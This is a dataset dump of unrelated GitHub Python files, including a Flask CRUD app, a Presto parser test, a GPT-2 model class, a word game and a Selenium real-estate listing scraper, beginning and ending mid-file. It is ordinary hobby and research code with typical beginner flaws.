'c'])\nq.append('x')\nq.appendleft('y')\nprint(q)\n\ndd = defaultdict(lambda: 'N/A')\ndd['key1'] = 'abc'\nprint(dd['key1'])\nprint(dd['key2'])\n\nd = dict([('a', 1), ('b', 2), ('c', 3)])\nprint(d)\nod = OrderedDict([('a', 1), ('b', 2), ('c', 3)])\nprint(od)\n\nod2 = OrderedDict()\nod2['z'] = 1\nod2['y'] = 2\nod2['x'] = 3\nprint(list(od2.keys()))\n\nc = Counter()\nfor ch in 'programming':\n c[ch] = c[ch] + 1\nprint(c)\n\n\n\n","repo_name":"Rynxiao/python3-learn","sub_path":"inner-module/collections_m.py","file_name":"collections_m.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73818450792","text":"import os\nfrom typing import List, Generator\n\nfrom src.models.dataframe_model import DataFrameModel\nimport pandas as pd\n\nfrom src.types import MerData\n\n\ndef mock_tact_scenario(mer_data: MerData, refs: List[str]) -> MerData:\n \"\"\"\n Mock all tactical scenario's to zero (equator)\n \"\"\"\n if 'TACTICAL_SCENARIO' not in mer_data:\n mer_data['TACTICAL_SCENARIO'] = DataFrameModel(pd.DataFrame(columns=['REFERENCE']), 'TACTICAL_SCENARIO')\n\n for ref in refs:\n if ref not in list(mer_data['TACTICAL_SCENARIO'].original_df['REFERENCE']):\n mer_data['TACTICAL_SCENARIO'].original_df = \\\n mer_data['TACTICAL_SCENARIO'].original_df.append(\n pd.DataFrame({\n 'GRID CENTER LAT': [0],\n 'GRID CENTER LONG': [0],\n 'REFERENCE': [ref]\n }), ignore_index=True)\n return mer_data\n\n\ndef get_valid_files_from_folder(path: str) -> Generator:\n \"\"\"\n return all zip and text files from the given directory\n \"\"\"\n for root, dirs, files in os.walk(path):\n for file in files:\n if file.endswith(('.txt', '.zip')):\n yield os.path.join(root, file)\n","repo_name":"jooppoelman/mer.io","sub_path":"src/handlers/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74396929831","text":"from flask import Flask, flash, render_template, request, url_for, redirect, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.secret_key = \"Secrect Key\"\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:rootku@localhost/crud'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\n\n\nclass Data(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(100))\n email = db.Column(db.String(100))\n phone = db.Column(db.String(100))\n\n def __init__(self, name, email, phone):\n self.name = name\n self.email = email\n self.phone = phone\n\n\n# this function created the tables in the database\nwith app.app_context():\n db.create_all()\n\n\n@app.route('/')\ndef Index():\n allData = Data.query.all()\n\n return render_template(\"index.html\", employees=allData)\n\n# Rute untuk membaca data dengan metode GET\n@app.route('/get_data', methods=['GET'])\ndef get_data():\n # Mengambil semua data dari database\n allData = Data.query.all()\n \n # Menyusun data ke dalam format yang sesuai (misalnya, JSON)\n data_list = []\n for data in allData:\n data_dict = {\n 'id': data.id,\n 'name': data.name,\n 'email': data.email,\n 'phone': data.phone\n }\n data_list.append(data_dict)\n\n return jsonify(data_list)\n\n@app.route('/insert', methods=['POST'])\ndef insert():\n\n if request.method == 'POST':\n\n flash(\"Data Penderita Berhasil Ditambahkan!\")\n\n name = request.form['name']\n email = request.form['email']\n phone = request.form['phone']\n\n myData = Data(name, email, phone)\n db.session.add(myData)\n db.session.commit()\n\n return redirect(url_for('Index'))\n\n\n@app.route('/update', methods=['GET', 'POST'])\ndef update():\n\n if request.method == 'POST':\n myData = Data.query.get(request.form.get('id'))\n\n myData.name = request.form['name']\n myData.email = request.form['email']\n myData.phone = request.form['phone']\n\n db.session.commit()\n flash(\"Data Penderita Berhasil Diubah.\")\n\n return redirect(url_for('Index'))\n\n\n@app.route('/delete//', methods=['GET', 'POST'])\ndef delete(id):\n myData = Data.query.get(id)\n db.session.delete(myData)\n db.session.commit()\n\n flash(\"Data Penderita Berhasil Dihapus.\")\n\n return redirect(url_for('Index'))\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"Avrians/CRUD-Flask_WebApps","sub_path":"App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70550048232","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sys\n\nif len(sys.argv) != 2 :\n print('Incorrect number of arguements. Instead use:')\n print('\\tpython code.py [RunGlobalShift.txt]')\n exit(-1)\n\n\nrunNo = []\npeak = []\nstd = []\nwith open(sys.argv[1],'r') as f:\n for line in f:\n parse = line.strip().split(\" \")\n runNo.append( int(parse[0]) )\n peak.append( float(parse[3]) )\n std.append( float(parse[4]) )\n\nplt.errorbar(runNo,peak,yerr=std,linestyle='none',marker='o',color='blue')\nplt.ylim([-6,3])\nplt.xlabel('Run Number [a.u.]',fontsize=16)\nplt.ylabel('Photon Peak Position [ns]',fontsize=16)\nplt.yticks(fontsize=14)\nplt.xticks(fontsize=14)\nplt.savefig('runshifts.pdf',bbox_inches='tight')\nplt.show()\n","repo_name":"hauenst/bandsoft_calib","sub_path":"photon_align/plot_singleBarShift.py","file_name":"plot_singleBarShift.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36679052962","text":"# -*- encoding: utf-8 -*-\n\n\"\"\"\nEfficiency test of Bansal's algorithm for Roth's problem\nUsage:\n$ python bdg_on_roth_problem2.py [end_n] [sample]\n=> investigate ROTH[2] to ROTH[end_n-1] with sample = [sample]\n\"\"\"\n\nimport sys\nimport time as tm\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport pickle\nfrom Hypergraph import Hypergraph\nfrom bansal_dadusch_garg import *\n\ndef solve_roth(n):\n graph = Hypergraph.roth(n)\n print('n =', n, ':')\n print(graph.incidence)\n start = tm.time()\n coloring, num_steps = solve(graph, print_per_time = 100)\n elapsed_time = tm.time() - start\n return coloring, num_steps, elapsed_time\n\ndef solve_roth_bf(n):\n # brute force\n graph = Hypergraph.roth(n)\n print('n =', n, ':')\n print(graph.incidence)\n start = tm.time()\n coloring = graph.find_optimal_coloring()\n elapsed_time = tm.time() - start\n return coloring, elapsed_time\n\ndef measure_time(n, sample = 10):\n result = np.asarray([solve_roth(n) for i in range(sample)])\n num_steps_median = np.median(result[:, 1])\n elapsed_time_median = np.median(result[:, 2])\n return num_steps_median, elapsed_time_median\n\ndef measure_time_bf(n, sample = 10):\n result = np.asarray([solve_roth_bf(n) for i in range(sample)])\n elapsed_time_median = np.median(result[:, 1])\n return elapsed_time_median\n\n\nsample = int(sys.argv[2])\nnrange = np.arange(2, int(sys.argv[1]))\nresult = np.asarray([measure_time(n, sample = sample) for n in nrange])\nelapsed_time_bf = np.asarray([measure_time_bf(n, sample = sample) for n in nrange])\nnum_steps = result[:, 0]\nelapsed_time = result[:, 1]\nprint(elapsed_time)\nprint(elapsed_time_bf)\nprint(num_steps)\n\nwith open(\"elapsed_time.pickle\", \"wb\") as f:\n pickle.dump(elapsed_time, f)\nwith open(\"elapsed_time_bf.pickle\", \"wb\") as f:\n pickle.dump(elapsed_time_bf, f)\nwith open(\"num_steps_lst.pickle\", \"wb\") as f:\n pickle.dump(num_steps, f)\n\nplt.gca().get_xaxis().set_major_locator(ticker.MaxNLocator(integer=True))\n\nplt.plot(nrange, elapsed_time, label=\"Bansal\")\nplt.plot(nrange, elapsed_time_bf, label=\"brute force\")\nplt.title('Elapsed time')\nplt.xlabel('n')\nplt.ylabel('sec.')\nplt.legend()\nplt.savefig('elapsed_time.png')\nplt.show()\n\nplt.gca().get_xaxis().set_major_locator(ticker.MaxNLocator(integer=True))\nplt.plot(nrange, num_steps)\nplt.title('Number of solve(SDP)')\nplt.xlabel('n')\nplt.ylabel('number')\nplt.savefig('num_steps.png')\nplt.show()\n","repo_name":"privet-kitty/hypergraph-discrepancy","sub_path":"bdg_on_roth_problem2.py","file_name":"bdg_on_roth_problem2.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3436129990","text":"from functools import cache\nclass Solution:\n def bestTeamScore(self, scores: List[int], ages: List[int]) -> int:\n max_scores= [0]*(max(ages))\n\n scores_ages = sorted(list(zip(scores,ages)))\n for score,age in scores_ages:\n max_scores[age-1] = score + max(max_scores[:age])\n \n return max(max_scores)\n","repo_name":"jlcarr/LeetCode","sub_path":"Problem_1626/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37255272489","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 5 18:19:45 2020\n\n@author: José Correia\n\"\"\"\n\nfrom PyQt5 import QtWidgets, uic\nimport sys\n\n\nclass Arduino(QtWidgets.QWidget):\n def __init__(self):\n QtWidgets.QWidget.__init__(self, parent=None)\n uic.loadUi('arduino.ui', self) # Load the .ui file\n \n \n #self.setGeometry(200, 200, 200, 100)\n #self.PortaCom.textEdited.connect(self.LePorta)\n #self.Pressao.valueChanged.connect(self.LePressao)\n #self.Volume.valueChanged.connect(self.LeVolume)\n \n \n self.show() # Show the GUI\n \n def LePressao(self):\n #print(self.Pressao.value())\n return\n \n\n \n def LeVolume(self, nome:str)->None:\n\n self.Volume.setValue(len(nome))\n \n self.QPushButton('Exit', self)\n quit = QtWidgets.QPushButton('Exit', self)\n self.connect(quit, uic.SIGNAL('clicked()'),\n QtWidgets.qApp, uic.SLOT('quit()'))\n\napp = QtWidgets.QApplication(sys.argv)\nwindow = Arduino()\napp.exec_()\n","repo_name":"armatita/pressure_volume_controller","sub_path":"old/Arduino.py","file_name":"Arduino.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17410905771","text":"import math\n\nimport torch.nn as nn\n\nfrom modelzoo.common.pytorch.layers import (\n EmbeddingLayer,\n TransformerDecoder,\n TransformerDecoderLayer,\n)\nfrom modelzoo.transformers.pytorch.gpt2.sparse_mask import (\n create_fixed_sparse_attention_mask,\n)\nfrom modelzoo.transformers.pytorch.transformer_utils import (\n build_broadcastable_attention_mask,\n make_sparse_mask_broadcastable,\n)\n\n\nclass GPT2LMHeadModel(nn.Module):\n \"\"\"\n GPT-2 model with LM head\n \"\"\"\n\n def __init__(\n self,\n # Embedding\n vocab_size=50257,\n max_position_embeddings=1024,\n embd_pdrop=0.1,\n position_embedding_type=\"learned\",\n hidden_size=768,\n share_embedding_weights=True,\n embedding_layer_norm=False,\n # Encoder\n num_hidden_layers=12,\n dropout_rate=0.1,\n layer_norm_epsilon=1.0e-5,\n # Encoder - Attention\n num_heads=12,\n attention_type=\"scaled_dot_product\",\n use_projection_bias_in_attention=True,\n use_ffn_bias_in_attention=True,\n attention_dropout_rate=0.1,\n attention_softmax_fp32=True,\n attention_kernel=None,\n # Encoder - ffn\n filter_size=3072,\n nonlinearity=\"gelu\",\n use_ffn_bias=True,\n # Task-specific\n use_bias_in_output=False,\n initializer_range=0.02,\n embedding_initializer=None,\n initializer=None,\n output_layer_initializer=None,\n # Loss\n loss_weight=1.0,\n fixed_sparse_attention=None,\n loss_scaling=\"num_tokens\",\n ):\n super(GPT2LMHeadModel, self).__init__()\n\n # std deviation for weight initialization\n self.initializer_range = initializer_range\n self.num_hidden_layers = num_hidden_layers\n self.share_embedding_weights = share_embedding_weights\n self.embedding_layer_norm = embedding_layer_norm\n self.max_position_embeddings = max_position_embeddings\n self.position_embedding_type = position_embedding_type\n\n assert (\n self.position_embedding_type != \"rotary\"\n ), f\"GPT2 models don't support rotary position embedding.\"\n\n if initializer is None:\n attention_initializer = {\n \"name\": \"normal\",\n \"mean\": 0.0,\n \"std\": self.initializer_range\n / math.sqrt(2 * self.num_hidden_layers),\n }\n ffn_initializer = {\n \"name\": \"normal\",\n \"mean\": 0.0,\n \"std\": self.initializer_range,\n }\n else:\n attention_initializer = initializer\n ffn_initializer = initializer\n\n if embedding_initializer is None:\n embedding_initializer = {\n \"name\": \"normal\",\n \"mean\": 0.0,\n \"std\": self.initializer_range,\n }\n\n self.embedding_layer = EmbeddingLayer(\n vocab_size=vocab_size,\n embedding_size=hidden_size,\n embeddings_initializer=embedding_initializer,\n position_embedding_type=position_embedding_type,\n position_embeddings_initializer=embedding_initializer,\n max_position_embeddings=max_position_embeddings,\n )\n\n if self.embedding_layer_norm:\n self.embedding_ln_f = nn.LayerNorm(\n hidden_size, eps=layer_norm_epsilon\n )\n\n self.drop_embd = nn.Dropout(embd_pdrop)\n\n decoder_layer = TransformerDecoderLayer(\n d_model=hidden_size,\n nhead=num_heads,\n dim_feedforward=filter_size,\n dropout=dropout_rate,\n activation=nonlinearity,\n layer_norm_eps=layer_norm_epsilon,\n norm_first=True,\n extra_attention_params={\"attention_kernel\": attention_kernel},\n add_cross_attention=False,\n attention_type=attention_type,\n attention_dropout_rate=attention_dropout_rate,\n attention_softmax_fp32=attention_softmax_fp32,\n use_projection_bias_in_attention=use_projection_bias_in_attention,\n use_ffn_bias_in_attention=use_ffn_bias_in_attention,\n use_ffn_bias=use_ffn_bias,\n attention_initializer=attention_initializer,\n attention_output_layer_initializer=output_layer_initializer,\n ffn_initializer=ffn_initializer,\n ffn_output_layer_initializer=output_layer_initializer,\n use_ff_layer1_dropout=False,\n )\n\n # Final LayerNorm\n self.ln_f = nn.LayerNorm(hidden_size, eps=layer_norm_epsilon)\n\n self.transformer_decoder = TransformerDecoder(\n decoder_layer, num_layers=num_hidden_layers, norm=self.ln_f,\n )\n\n if fixed_sparse_attention is not None:\n self.fixed_sparsity_mask = create_fixed_sparse_attention_mask(\n max_sequence_length=max_position_embeddings,\n n_heads=num_heads,\n **fixed_sparse_attention,\n )\n else:\n self.fixed_sparsity_mask = None\n\n self.lm_head = nn.Linear(\n hidden_size, vocab_size, bias=use_bias_in_output\n )\n\n self.tie_weights()\n\n self.__reset_parameters()\n\n def reset_parameters(self):\n self.embedding_layer.reset_parameters()\n self.transformer_decoder.reset_parameters()\n self.__reset_parameters()\n\n def __reset_parameters(self):\n # Init final norm layer\n self.ln_f.bias.data.zero_()\n self.ln_f.weight.data.fill_(1.0)\n\n # Initialize LM head\n self.lm_head.weight.data.normal_(mean=0.0, std=self.initializer_range)\n if self.lm_head.bias is not None:\n self.lm_head.bias.data.zero_()\n\n def tie_weights(self):\n if not self.share_embedding_weights:\n return\n\n output_embedding = self.get_output_embeddings()\n input_embedding = self.get_input_embeddings()\n output_embedding.weight = input_embedding.weight\n\n if getattr(output_embedding, \"bias\", None) is not None:\n output_embedding.bias.data = nn.functional.pad(\n output_embedding.bias.data,\n (\n 0,\n output_embedding.weight.shape[0]\n - output_embedding.bias.shape[0],\n ),\n \"constant\",\n 0,\n )\n if hasattr(output_embedding, \"out_features\") and hasattr(\n input_embedding, \"num_embeddings\"\n ):\n output_embedding.out_features = input_embedding.num_embeddings\n\n def get_output_embeddings(self):\n return self.lm_head\n\n def get_input_embeddings(self):\n return self.embedding_layer.get_input_embeddings()\n\n def forward(\n self, input_ids=None, attention_mask=None, labels=None,\n ):\n hidden_states = self.embedding_layer(input_ids)\n if self.embedding_layer_norm:\n hidden_states = self.embedding_ln_f(hidden_states)\n hidden_states = self.drop_embd(hidden_states)\n\n causal_attention_mask = build_broadcastable_attention_mask(\n attention_mask,\n build_causal=True,\n device=input_ids.device,\n dtype=hidden_states.dtype,\n )\n\n # Fixed sparse attention, used in GPT-3 model\n sparse_attention_mask = None\n if self.fixed_sparsity_mask is not None:\n sparse_attention_mask = make_sparse_mask_broadcastable(\n self.fixed_sparsity_mask,\n attention_mask,\n dtype=hidden_states.dtype,\n device=hidden_states.device,\n revert_mask=False,\n )\n\n hidden_states = self.transformer_decoder(\n hidden_states,\n tgt_mask=causal_attention_mask,\n sparse_mask=sparse_attention_mask,\n )\n\n lm_logits = self.lm_head(hidden_states)\n\n return lm_logits\n","repo_name":"standardgalactic/modelzoo","sub_path":"modelzoo/transformers/pytorch/gpt2/gpt2_model.py","file_name":"gpt2_model.py","file_ext":"py","file_size_in_byte":7958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"39792991582","text":"import random\n\n## Initializes the game elements\n# Retrieves the word dictionary\nf = open('words.txt', 'r')\ntext = f.read()\n\n# Splits dictionary & initializes arrays\nlines = text.split(\"\\n\")\nwords = []\nfour_letter_words = []\n\n# Collects all words\nfor each in lines:\n words += each.split(\" \")\n\n# Retrieves only valid 4 letter words\nfor each in words:\n if len(each) == 4:\n if('-' in each or '.' in each):\n continue\n else:\n four_letter_words.append(each)\n\nfour_letter_words = [x.lower() for x in four_letter_words]\n\n########################################\n# Gets a random, valid, 4 letter word\ndef randomword(words):\n word = words[random.randint(0,len(words))]\n return word\n\n###########################################\n# Verifies the input has 4 letters\ndef fourletters(input_word):\n if(len(input_word) != 4):\n return False\n else:\n return True\n###########################################\n# Verifies there is only 1 difference in the input word\ndef differences(input_word, prev_word):\n diff = 0\n counter = 0\n\n while(counter < 4):\n if(input_word[counter] != prev_word[counter]):\n diff = diff + 1\n\n counter = counter + 1\n\n if(diff > 1):\n return False\n else:\n return True\n##########################################\n# Verifies the input is valid\ndef dictionarycheck(input_word, dictionary):\n verified = False\n for each in dictionary:\n if(input_word == each):\n verified = True\n\n return verified\n###########################################\n# Handles gameplay\ndef gameplay(prev_word, final_word, dictionary):\n input_word = input(\"Please enter a word: \")\n if(fourletters(input_word) == False):\n print(\"Please enter a valid word\" + '\\n')\n print(\"Previous word was: \" + prev_word)\n gameplay(prev_word, final_word, dictionary)\n\n if(differences(input_word, prev_word) == False):\n print(\"Please enter a valid word\" + '\\n')\n print(\"Previous word was: \" + prev_word)\n gameplay(prev_word, final_word, dictionary)\n\n if(dictionarycheck(input_word, dictionary) == False):\n print(\"Please enter a valid word\" + '\\n')\n print(\"Previous word was: \" + prev_word)\n gameplay(prev_word, final_word, dictionary)\n\n if(input_word == final_word):\n print(\"You did it! Congratulations\")\n else:\n gameplay(input_word, final_word, dictionary)\n\n###########################################\n#game starts\nstartword = randomword(four_letter_words)\nfinalword = randomword(four_letter_words)\n\nprint(\"This is your starting word: \" + startword)\nprint(\"This is your final word: \" + finalword)\n\ngameplay(startword, finalword, four_letter_words)\n","repo_name":"spetsnazzy/Word-Game","sub_path":"Word_Game.py","file_name":"Word_Game.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70287406312","text":"#\n# @lc app=leetcode id=804 lang=python3\n#\n# [804] Unique Morse Code Words\n#\n\n# @lc code=start\nfrom typing import List\n\n\nclass Solution:\n def uniqueMorseRepresentations(self, words: List[str]) -> int:\n morse = [\".-\", \"-...\", \"-.-.\", \"-..\", \".\", \"..-.\", \"--.\", \"....\", \"..\", \".---\", \"-.-\", \".-..\", \"--\",\n \"-.\", \"---\", \".--.\", \"--.-\", \".-.\", \"...\", \"-\", \"..-\", \"...-\", \".--\", \"-..-\", \"-.--\", \"--..\"]\n transformations = set()\n\n for word in words:\n transformation = ''.join(morse[ord(c) - ord('a')] for c in word)\n transformations.add(transformation)\n\n return len(transformations)\n# @lc code=end\n\n","repo_name":"MegaBlackLabel/leetcode","sub_path":"804.unique-morse-code-words.py","file_name":"804.unique-morse-code-words.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70973298473","text":"from unittest import TestCase\r\nfrom mock import MagicMock, patch\r\nfrom presto_types_parser.src.complex_column_process.map_processor_builder import \\\r\n build_map_processor, extract_inner_type_signatures\r\n\r\n\r\nclass TestPrestoMapProcessorBuilder(TestCase):\r\n map_type_signature = {\r\n \"rawType\": \"map\",\r\n \"arguments\": [\r\n {\r\n \"kind\": \"TYPE\",\r\n \"value\": {\r\n \"rawType\": \"varchar\",\r\n \"arguments\": [\r\n {\r\n \"kind\": \"LONG\",\r\n \"value\": 2147483647\r\n }\r\n ]\r\n }\r\n },\r\n {\r\n \"kind\": \"TYPE\",\r\n \"value\": {\r\n \"rawType\": \"varchar\",\r\n \"arguments\": [\r\n {\r\n \"kind\": \"LONG\",\r\n \"value\": 2147483647\r\n }\r\n ]\r\n }\r\n }\r\n ]\r\n }\r\n\r\n def test_given_map_type_signature_should_return_the_type_signature_that_presents_the_values(\r\n self):\r\n expected_inner_types_signatures = [{\r\n \"rawType\": \"varchar\",\r\n \"arguments\": [\r\n {\r\n \"kind\": \"LONG\",\r\n \"value\": 2147483647\r\n }\r\n ]\r\n }]\r\n\r\n self.assertEqual(\r\n expected_inner_types_signatures,\r\n extract_inner_type_signatures(self.map_type_signature)\r\n )\r\n\r\n @patch(\"presto_types_parser.src.complex_column_process.map_processor_builder.\"\r\n \"new_map_process_function\")\r\n def test_when_build_cell_processor_should_return_map_processor_with_match_value_processor(\r\n self, mocked_new_process_function):\r\n mocked_cell_processor = MagicMock()\r\n\r\n process_row = build_map_processor(self.map_type_signature, [mocked_cell_processor])\r\n\r\n mocked_new_process_function.assert_called_once_with(\r\n mocked_cell_processor,\r\n 'varchar'\r\n )\r\n\r\n self.assertTrue(callable(process_row))\r\n","repo_name":"ofekby/presto-types-parser","sub_path":"presto_types_parser/tests/complex_column_process/test_map_processor_builder.py","file_name":"test_map_processor_builder.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12366701337","text":"# packages\nimport os\nimport re\nimport time\nimport pytz\nimport datetime\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import (\n NoSuchElementException,\n StaleElementReferenceException,\n TimeoutException\n )\nfrom selenium.webdriver.common.action_chains import ActionChains\n\n# other modules\nfrom dotenv import load_dotenv\nfrom driver_manager import WebDriverManager\n\n# own packages\nimport database_app\nimport functions\n\n# get data from .env file\nload_dotenv()\n\n# variables\ndriver = WebDriverManager.get_driver()\nactions = ActionChains(driver)\nurl_immo_website = os.environ[\"URL_IMMO_WEBSITE_BI\"]\ncity_researched_content = os.environ[\"CITY_RESEARCHED_CONTENT\"]\ncurrent_time_utc = datetime.datetime.now(tz=pytz.utc).timestamp()\nfunctions = functions\n\n\n# functions\ndef check_accept_section(cssSelector: str):\n\n driver.implicitly_wait(5)\n try:\n accept = WebDriverWait(driver, 5).until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, cssSelector))\n )\n accept.click()\n except (\n NoSuchElementException,\n StaleElementReferenceException,\n TimeoutException\n ):\n print(\"KO : no accept part\")\n\n\ndef add_new_announces():\n\n global_page_number = 2\n\n print(\"------------------Add_new_annouces_Start------------------\")\n # connection to website\n driver.get(url_immo_website)\n driver.implicitly_wait(5)\n # check an agree the terms section exists\n time.sleep(2)\n check_accept_section('span.didomi-continue-without-agreeing')\n time.sleep(2)\n\n # fill research section\n search_input = driver.find_element(By.CSS_SELECTOR, \"input.tt-input\")\n search_input.send_keys(os.environ[\"CITY_RESEARCHED\"])\n time.sleep(2)\n\n # select desired town in the dropdown menu\n try:\n dropdown_element = driver.find_elements(By.CSS_SELECTOR, \"div.suggestionItem\")[0]\n time.sleep(2)\n actions.click(dropdown_element).perform()\n except (NoSuchElementException, StaleElementReferenceException, TimeoutException):\n print(\"KO : unable to make the dropdown menu appear\")\n\n # click on the search button\n time.sleep(2)\n driver.find_element(By.CSS_SELECTOR, \"button.btn.btn-primary.search\").click()\n annonce = 0\n\n while True:\n try:\n next_results_btn = driver.find_element(\n By.CSS_SELECTOR, \"a.btn.goForward.btn-primary.pagination__go-forward-button\"\n )\n except (NoSuchElementException):\n print(\"KO : no more next button\")\n break\n\n try:\n articles = driver.find_elements(\n By.CSS_SELECTOR, \"article.sideListItem\"\n )\n print(f\"------------------Page_Start {global_page_number-1}------------------\")\n print(\"articles\", articles)\n for article in articles:\n print(f\"{article} {annonce}\")\n annonce += 1\n print(\"------------------Article Start------------------\")\n print(\"article :\", article)\n\n # type of property\n type_of_property = \"\"\n try:\n type_of_property_content = article.find_element(\n By.CSS_SELECTOR, \"span.ad-overview-details__ad-title\"\n )\n type_of_property_content = type_of_property_content.text\n if \"maison\" in type_of_property_content.lower():\n type_of_property = \"maison\"\n elif \"appartement\" in type_of_property_content.lower():\n type_of_property = \"appartement\"\n else:\n type_of_property = \"\"\n print(\"type_of_property :\", type_of_property)\n\n except (NoSuchElementException):\n print(\"KO : no data for type_of_property found\")\n\n # town\n town = os.environ[\"CITY_RESEARCHED\"]\n print(\"town :\", town)\n\n # District&&Postcode\n district = \"\"\n postcode = 0\n try:\n address_content = article.find_element(\n By.CSS_SELECTOR, \"span.ad-overview-details__address-title\"\n )\n address_content = address_content.text\n # district\n try:\n district = re.findall(r\"\\((.*?)\\)\", address_content)[0]\n except IndexError:\n print(\"KO : no data for District found\")\n district = \"\"\n # postcode\n try:\n postcode = re.findall(r\"[0-9]*\", address_content)[0]\n except IndexError:\n print(\"KO : no data for Postcode found\")\n postcode = 0\n print(\"district :\", district)\n print(\"postcode :\", postcode)\n\n except (NoSuchElementException):\n print(\"KO : no data for District&&Postcode found\")\n\n # url\n url = \"\"\n try:\n url_content = article.find_element(By.CSS_SELECTOR, \"a.detailedSheetLink\")\n url = url_content.get_attribute('href')\n print(\"link :\", url)\n except (NoSuchElementException):\n print(\"KO : no data for url found\")\n\n # room number && surface\n surface = 0\n room_number = 0\n try:\n room_surface_content = article.find_element(\n By.CSS_SELECTOR, \"span.ad-overview-details__ad-title\"\n )\n content_text = room_surface_content.text\n # room\n room_number = room_surface_content.text\n pattern_room = r'(\\d+)\\s*pièce'\n room_content = re.findall(pattern_room, content_text)\n room_number = room_content[0]\n print(\"room_number :\", room_number)\n # surface\n surface = room_surface_content.text\n pattern_squaremeters = r'\\b(\\d+)\\b'\n surface_content = re.findall(pattern_squaremeters, content_text)\n surface = surface_content[-1]\n print(\"surface :\", surface)\n except (NoSuchElementException):\n print(\"KO : no data for room number && surface found\")\n\n # price\n price = 0\n try:\n price_content = article.find_element(By.CSS_SELECTOR, \"span.ad-price__the-price\")\n price_content = price_content.text\n price = ''.join(re.findall(r'\\d+', price_content))\n if len(price) > 7:\n price = None\n print(\"price :\", price)\n except (NoSuchElementException):\n print(\"KO : no data for price found\")\n\n # date\n date_add_to_db = current_time_utc\n print(\"date_add_to_db :\", date_add_to_db)\n\n print(\"------------------Article End------------------\")\n\n # add properties to db\n if not database_app.get_property_by_url(url):\n property_id = database_app.add_property(\n type_of_property,\n town,\n district,\n postcode,\n url,\n room_number,\n surface,\n date_add_to_db\n )\n database_app.add_price_to_property(date_add_to_db, property_id, price)\n\n # catch data to access the next page\n next_page_url = next_results_btn.get_attribute('href')\n print(\"next_page_url\", next_page_url)\n pattern_next_page_url_without_page = r\"(.+)\\?\"\n next_page_url_without_page = re.findall(pattern_next_page_url_without_page, next_page_url)[0]\n print(\"next_page_url_without_page :\", next_page_url_without_page)\n driver.get(next_page_url)\n global_page_number += 1\n print(\"------------------Add_new_annouces_End------------------\")\n except Exception as e:\n print(f\"An error occurred while processing the current page: {e}\")\n\n\ndef add_descriptions():\n print(\"------------------DESCRIPTION PART------------------\")\n # Add description to database\n property_urls = database_app.get_id_url_from_properties()\n\n for id_property, url_property in property_urls:\n\n print(f\"------------------Start add description {id_property}------------------\")\n print(\"url_property\", url_property)\n # check if the property has or not a description linked\n if not database_app.get_property_description_by_id(id_property):\n\n driver.get(url_property)\n driver.implicitly_wait(5)\n\n # check if a agreeing pop-up displays\n check_accept_section('span.didomi-continue-without-agreeing')\n driver.implicitly_wait(5)\n\n # check if the announce is still available\n try:\n outOfTheMarket = driver.find_element(By.CLASS_NAME, \"outOfTheMarketBanner\")\n print(f\"KO : Announce no more available {outOfTheMarket}\")\n database_app.delete_property(id_property)\n continue\n except (NoSuchElementException):\n print(\"OK : Announce still available\")\n\n labelsInfo = driver.find_elements(By.CSS_SELECTOR, \"div.labelInfo\")\n\n # default values\n # building options\n year_of_construction = \"\"\n exposition = \"\"\n floor = None\n total_floor_number = None\n neighborhood_description = \"\"\n\n # rooms\n bedroom_number = 0\n toilet_number = 0\n bathroom_number = 0\n cellar = False\n lock_up_garage = False\n\n # options indoor\n heating = \"\"\n tv_cable = False\n fireplace = False\n digicode = False\n intercom = False\n elevator = False\n fibre_optics_status = \"\"\n\n # options outdoor\n garden = False\n car_park_number = 0\n balcony = False\n large_balcony = False\n\n # administration\n estate_agency_fee_percentage = 0\n pinel = False\n denormandie = False\n announce_publication = \"\"\n announce_last_modification = current_time_utc\n\n # diagnostics\n dpe_date = \"\"\n energetic_performance_letter = None\n energetic_performance_number = 0\n climatic_performance_number = 0\n climatic_performance_letter = None\n\n regex_find_numbers = r'\\d+'\n regex_find_text_after_colon = r':\\s*([^:,]+)'\n\n driver.implicitly_wait(5)\n for labelInfo in labelsInfo:\n try:\n element = labelInfo.find_element(By.CSS_SELECTOR, \"span\")\n element_text = element.text.lower()\n\n # year_of_construction\n if \"construit\" in element_text:\n year_of_construction = re.findall(regex_find_numbers, element_text)[0]\n format_string_construction = \"%Y\"\n 